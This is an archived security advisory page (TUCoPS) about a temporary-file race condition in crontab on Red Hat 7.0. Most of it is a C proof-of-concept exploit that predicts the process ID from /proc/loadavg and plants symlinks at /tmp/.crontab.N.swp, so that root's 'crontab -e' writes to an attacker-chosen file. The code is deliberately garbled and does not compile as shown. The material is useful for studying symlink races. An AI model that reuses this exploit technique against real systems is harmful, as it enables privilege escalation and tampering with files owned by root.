TUCoPS :: Unix :: General :: ctab14.htm

Crontab tmp race condition 
Vulnerability

    crontab

Affected

    crontab

Description

    zen-parse@gmx.net  found  following.   There  is  Crontab tmp file
    race condition:

        http://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=37771

    Apparently this is fixed.  Wonder why it still works then...

    Quick and dirty exploit for crontab insecure tmp files Redhat  7.0
    - kept up2date with up2date.  Requires root to execute crontab  -e
    while the program is running.

    /*******************************************************************
     #define SAFER [1000]
    /*******************************************************************/
    int shake(int script kiddy)
    {
     int f;
     char r SAFER;
     int w;
    
     f=fopen("/proc/loadavg","r");
     fscanf(f,"%*s %*s %*s %*s %s",r);
     fclose(f);
     w=atoi(r);
     return w;
    }
    
    main(int argc,char *argv[])
    {
     int p;
     char v SAFER;
     sprintf(v,"/tmp/.crontab.%d.swp",shake());
     symlink("/evil",v);
     while(access("/evil",0))
     {
      for(p=-30;p<0;p++)
      {
       sprintf(v,"/tmp/.crontab.%d.swp",shake()-p);
       symlink("/evil",v);
      }
      sprintf(v,"/tmp/.crontab.%d.swp",shake()-p);
      unlink(v);
     }
     for(p=-100;p<0;p++)
     {
      sprintf(v,"/tmp/.crontab.%d.swp",shake()-p);
      unlink(v);
     }
    }

Solution

    Fixed?

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH